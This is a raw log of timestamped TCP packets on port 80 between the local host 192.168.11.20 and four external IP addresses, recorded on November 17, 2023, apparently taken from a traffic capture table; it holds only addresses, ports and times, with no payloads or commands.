                                                                                                                                                                                                Nov 17, 2023 19:30:32.483290911 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483453989 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483627081 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.523854017 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.524153948 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.623821974 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.623933077 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.623982906 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624030113 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624094963 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624144077 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624231100 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624237061 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624413967 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624525070 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624577045 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624766111 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624825954 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624907970 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624953032 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624998093 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.625437021 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.625735044 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.625782967 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.626101971 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.626178026 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.626285076 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.665312052 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.665509939 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.766170025 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.766303062 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.766346931 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.766665936 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.766720057 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.766787052 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.766829014 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.767389059 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.767472982 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.767515898 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.767554998 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.767853975 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.767913103 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.768140078 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:33.855350971 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:34.871015072 CET5017380192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:35.012079954 CET805017345.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:35.012428999 CET5017380192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:35.012530088 CET5017380192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:35.156433105 CET805017345.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:35.156496048 CET805017345.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:35.156825066 CET5017380192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:35.156898022 CET5017380192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:35.299185038 CET805017345.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:40.274414062 CET5017480192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:40.372479916 CET8050174199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:40.372659922 CET5017480192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:40.372844934 CET5017480192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:40.472738028 CET8050174199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:40.487772942 CET8050174199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:40.487910032 CET8050174199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:40.487960100 CET8050174199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:40.488147020 CET5017480192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:40.503276110 CET8050174199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:40.503457069 CET5017480192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:41.884978056 CET5017480192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:42.900511026 CET5017580192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:42.998768091 CET8050175199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:42.998995066 CET5017580192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:42.999169111 CET5017580192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:43.097939014 CET8050175199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:43.113601923 CET8050175199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:43.113672972 CET8050175199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:43.113724947 CET8050175199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:43.114033937 CET5017580192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:43.127614975 CET8050175199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:43.127960920 CET5017580192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:44.509262085 CET5017580192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.525104046 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.625133038 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.625490904 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.626696110 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.626821995 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.726686954 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.726928949 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.726985931 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727010012 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727027893 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727068901 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727108002 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727181911 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727261066 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727374077 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727478981 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727600098 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727655888 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727818012 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727874994 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727916956 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727989912 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.728159904 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.728276014 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.728446007 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.825957060 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826020956 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826064110 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826103926 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826173067 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826381922 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826451063 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826498032 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826535940 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826711893 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826752901 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826850891 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.826977968 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.827018976 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.827018976 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.828169107 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.828233957 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.828280926 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.828321934 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.828361034 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.828399897 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.828438997 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.828478098 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.828517914 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925394058 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925468922 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925517082 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925563097 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925607920 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925652981 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925698042 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925748110 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925793886 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.925838947 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.926244974 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.926367998 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.933751106 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.933834076 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.933892965 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.934228897 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:45.948904991 CET8050176199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:45.949337006 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:47.133878946 CET5017680192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:48.149415016 CET5017780192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:48.248934984 CET8050177199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:48.249229908 CET5017780192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:48.249404907 CET5017780192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:48.347742081 CET8050177199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363250971 CET8050177199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363322020 CET8050177199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363373995 CET8050177199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363670111 CET5017780192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363866091 CET5017780192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:48.363867044 CET5017780192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:48.376768112 CET8050177199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:48.377115965 CET5017780192.168.11.20199.59.243.225
                                                                                                                                                                                                Nov 17, 2023 19:30:48.462400913 CET8050177199.59.243.225192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:53.806298018 CET5017880192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:53.991489887 CET805017883.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:53.991852045 CET5017880192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:53.991980076 CET5017880192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:54.174395084 CET805017883.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:54.180856943 CET805017883.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:54.180922031 CET805017883.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:54.181076050 CET5017880192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:55.507059097 CET5017880192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:56.522485971 CET5017980192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:56.706633091 CET805017983.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:56.706986904 CET5017980192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:56.707088947 CET5017980192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:56.889578104 CET805017983.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:56.891144991 CET805017983.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:56.891221046 CET805017983.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:56.891560078 CET5017980192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:58.209563971 CET5017980192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.225194931 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.407474995 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.407834053 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.410080910 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.593880892 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594053984 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594084978 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594122887 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594329119 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594422102 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594504118 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594638109 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594667912 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594702959 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594789028 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.595024109 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.777868986 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.777951002 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778007030 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778086901 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778175116 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778242111 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778532028 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778574944 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778775930 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778873920 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778930902 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778985023 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778990030 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779154062 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779236078 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779323101 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779443026 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779663086 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779721975 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779905081 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779938936 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.780086994 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.780229092 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.961196899 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.961299896 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.961349010 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.961684942 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.961904049 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:30:59.962025881 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.962322950 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:59.962464094 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:00.145225048 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:00.145297050 CET805018083.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:00.145512104 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:31:00.912178993 CET5018080192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:31:01.927687883 CET5018180192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:31:02.111275911 CET805018183.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:02.111612082 CET5018180192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:31:02.111699104 CET5018180192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:31:02.293828964 CET805018183.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:02.295981884 CET805018183.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:02.296065092 CET805018183.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:02.296737909 CET5018180192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:31:02.299263954 CET805018183.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:02.299702883 CET5018180192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:31:02.299702883 CET5018180192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:31:02.755379915 CET5018180192.168.11.2083.229.19.76
                                                                                                                                                                                                Nov 17, 2023 19:31:02.938507080 CET805018183.229.19.76192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:07.487735987 CET5018280192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:07.586648941 CET8050182104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:07.587105989 CET5018280192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:07.587193966 CET5018280192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:07.687675953 CET8050182104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:07.857115984 CET8050182104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:07.857625008 CET8050182104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:07.857964039 CET5018280192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:09.097644091 CET5018280192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:10.113548040 CET5018380192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:10.212903023 CET8050183104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:10.213148117 CET5018380192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:10.213340044 CET5018380192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:10.314333916 CET8050183104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:10.471175909 CET8050183104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:10.473361015 CET8050183104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:10.473761082 CET5018380192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:11.722251892 CET5018380192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:12.737679005 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:12.837105989 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.837460041 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:12.838767052 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939385891 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939460039 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939508915 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939554930 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939642906 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939688921 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939686060 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939737082 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939795971 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940011978 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940035105 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940360069 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940464020 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940700054 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:13.038383007 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.038460970 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.038619041 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:13.038733006 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039216995 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039328098 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039382935 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039459944 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039572954 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039602041 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039657116 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039729118 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039777040 CET5018480192.168.11.20104.21.52.182
